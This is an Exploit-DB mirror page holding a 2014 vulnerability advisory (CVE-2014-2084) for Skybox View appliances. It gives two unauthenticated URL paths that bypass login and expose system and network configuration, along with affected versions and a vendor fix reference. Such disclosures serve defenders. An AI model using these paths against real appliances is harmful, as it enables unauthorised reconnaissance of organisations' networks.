bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/33327.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

48 lines
No EOL
1.8 KiB
Text
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: [SKYBOX Security Multiple
Information Disclosure]
# Date: [22-Jan-2014]
# Exploit Author: [Luigi Vezzoso]
# Vendor Homepage: [http://www.skyboxsecurity.com]
# Version: [Skybox View Appliances with ISO versions: 6.3.33-2.14,
6.3.31-2.14, 6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57]
# Tested on: [Centos 6.4 kernel 2.6.32]
# CVE : [CVE-2014-2084]
#OVERVIEW
A vulnerability has been found in some Skybox View Appliances Admin
interfaces which would allow a potential malicious party to bypass
the authentication mechanism and obtain read-only access to the
appliances administrative menus. This would allow the malicious
party to read system-related information such as interface names, IP
addresses and the appliance status.
#INTRODUCTION
Skybox Security has a complete portfolio of security management
tools that deliver the security intelligence needed to act fast to
minimize risks and eliminate attack vectors. Based on a powerful
risk analytics platform that links data from vulnerability scanners,
threat intelligence feeds, firewalls and other network infrastructure
devices Skybox gives you context to prioritize risks accurately and
automatically, in minutes.
#VULNERABILITY DESCRIPTION
It's possible to obtain useful information about the version and
network configuration of skybox appliances bypassing the webui
interface.
For the appliance system info open with a browser:
https://1.1.1.1:444/scripts/commands/getSystemInformation?_=111111111
For the appliance network info open with a browser:
https://1.1.1.1:444/scripts/commands/getNetworkConfigurationInfo
#VERSIONS AFFECTED
Skybox View Appliances with ISO versions: 6.3.33-2.14, 6.3.31-2.14,
6.4.42-2.54, 6.4.45-2.56, 6.4.46-2.57
#SOLUTION
Please refer to the vendor security advisor: Security Advisory 2014-
3-25-1
#CREDITS
Luigi Vezzoso
email: luigivezzoso@gmail.com
skype: luigivezzoso
Reference in a new issue View git blame Copy permalink